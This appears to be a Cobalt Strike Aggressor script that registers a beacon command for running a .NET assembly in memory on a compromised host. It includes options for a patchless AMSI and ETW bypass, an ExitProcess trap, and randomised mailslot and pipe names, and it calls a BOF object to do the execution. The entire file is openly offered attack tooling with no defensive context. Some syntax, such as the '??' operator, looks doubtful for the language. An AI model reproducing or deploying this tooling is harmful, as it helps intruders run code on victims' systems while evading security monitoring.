beacon_command_register(
    "senjata-execute-assembly",
    "Run a .NET assembly with patchless AMSI/ETW bypass + ExitProcess trap",
    "Usage: senjata-execute-assembly --dotnetassembly <path> [--amsi] [--etw] [--mailslot] [--appdomain <name>] [--entrypoint <0|1>] [--assemblyargs \"<args>\"] [--slotname <name>] [--pipename <name>]");

alias senjata-execute-assembly {
    local('$bid $args %parsed $asm_bytes $asm_len $packed $bof_path');
    $bid = $1;
    $args = substr($0, strlen("senjata-execute-assembly "));
    %parsed = parse_senjata_args($args);

    if (%parsed['dotnetassembly'] is $null) {
        berror($bid, "[-] --dotnetassembly is required");
        return;
    }
    $asm_bytes = readb(openf(%parsed['dotnetassembly']));
    $asm_len = strlen($asm_bytes);

    $packed = bof_pack($bid, "ziiii zzz b",
        %parsed['appdomain']     ?? "DefaultDomain",
        iff(%parsed['amsi'],     1, 0),
        iff(%parsed['etw'],      1, 0),
        iff(%parsed['mailslot'], 1, 0),
        %parsed['entrypoint']    ?? 1,
        %parsed['slotname']      ?? rand_slot_name(),
        %parsed['pipename']      ?? rand_pipe_name(),
        %parsed['assemblyargs']  ?? "",
        $asm_bytes);

    $bof_path = script_resource("senjata-execute-assembly.x64.o");
    beacon_inline_execute($bid, readbof($bid, $bof_path, $packed), "go", $packed);
}

sub rand_slot_name { return "slot_" . substr(uc(formatNumber(rand() * 1000000, 10, 16)), 0, 8); }
sub rand_pipe_name { return "pipe_" . substr(uc(formatNumber(rand() * 1000000, 10, 16)), 0, 8); }

sub parse_senjata_args {
    local('%r @parts $i $key');
    %r = %();
    @parts = split(" ", $1);
    $i = 0;
    while ($i < size(@parts)) {
        $key = @parts[$i];
        if ($key eq "--dotnetassembly" || $key eq "--appdomain" || $key eq "--entrypoint"
         || $key eq "--slotname" || $key eq "--pipename" || $key eq "--assemblyargs") {
            %r[substr($key, 2)] = @parts[$i + 1];
            $i = $i + 2;
        } else if ($key eq "--amsi" || $key eq "--etw" || $key eq "--mailslot") {
            %r[substr($key, 2)] = 1;
            $i = $i + 1;
        } else {
            $i = $i + 1;
        }
    }
    return %r;
}
